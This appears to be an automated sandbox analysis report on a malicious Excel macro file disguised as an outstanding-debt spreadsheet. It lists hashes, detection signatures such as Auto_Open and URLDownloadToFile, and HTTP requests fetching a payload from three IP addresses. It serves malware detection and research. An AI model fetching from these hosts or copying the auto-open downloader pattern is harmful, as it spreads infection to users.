Loading ...

Play interactive tourEdit tour

Analysis Report Outstanding-Debt-1636503299-05042021.xlsm

Overview

General Information

Sample Name:Outstanding-Debt-1636503299-05042021.xlsm
Analysis ID:404076
MD5:770ec8230138bb271c449bdaf5da519b
SHA1:21a0bde033c46eab8d42e5b6d9431f52f5c6ce48
SHA256:43c9954c68907acc1f1a6e7d5cc90a3043f9da1c8416b079d182865abea734c7
Tags:xlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Allocates a big amount of memory (probably used for heap spraying)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5872 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Source: excel.exeMemory has grown: Private usage: 1MB later: 83MB
Source: global trafficTCP traffic: 192.168.2.3:49722 -> 91.211.91.81:80
Source: global trafficTCP traffic: 192.168.2.3:49722 -> 91.211.91.81:80
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.211.91.81Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 5.34.179.36Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.153.229.23Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.211.91.81Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 5.34.179.36Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.153.229.23Connection: Keep-Alive
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://api.aadrm.com/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://api.cortana.ai
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://api.office.net
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://api.onedrive.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://augloop.office.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://cdn.entity.
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://clients.config.office.net/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://config.edge.skype.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://cortana.ai
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://cortana.ai/api
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://cr.office.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://dev.cortana.ai
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://devnull.onenote.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://directory.services.
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://graph.windows.net
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://graph.windows.net/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://lifecycle.office.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://login.windows.local
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://management.azure.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://management.azure.com/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://messaging.office.com/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://ncus.contentsync.
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://officeapps.live.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://onedrive.live.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://outlook.office.com/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://outlook.office365.com/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://settings.outlook.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://staging.cortana.ai
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://tasks.office.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://wus2.contentsync.
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 23A21570-D324-4D14-8714-5F35806F5DD6.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Found malicious Excel 4.0 MacroShow sources
Source: Outstanding-Debt-1636503299-05042021.xlsmInitial sample: urlmon
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Blasr, Function Auto_Open, API Microsoft Excel:Application.Run(:Range)Name: Auto_Open
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Outstanding-Debt-1636503299-05042021.xlsmInitial sample: EXEC
Source: Outstanding-Debt-1636503299-05042021.xlsmOLE, VBA macro line: Private Sub Auto_Open()
Source: VBA code instrumentationOLE, VBA macro: Module Blasr, Function Auto_OpenName: Auto_Open
Source: Outstanding-Debt-1636503299-05042021.xlsmOLE indicator, VBA macros: true
Source: classification engineClassification label: mal60.expl.evad.winXLSM@1/9@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Outstanding-Debt-1636503299-05042021.xlsmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{F65750DD-4F83-48D0-AA77-B828D3A69A99} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWindow found: window name: SysTabControl32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Outstanding-Debt-1636503299-05042021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
Source: Outstanding-Debt-1636503299-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: Outstanding-Debt-1636503299-05042021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Outstanding-Debt-1636503299-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: Outstanding-Debt-1636503299-05042021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
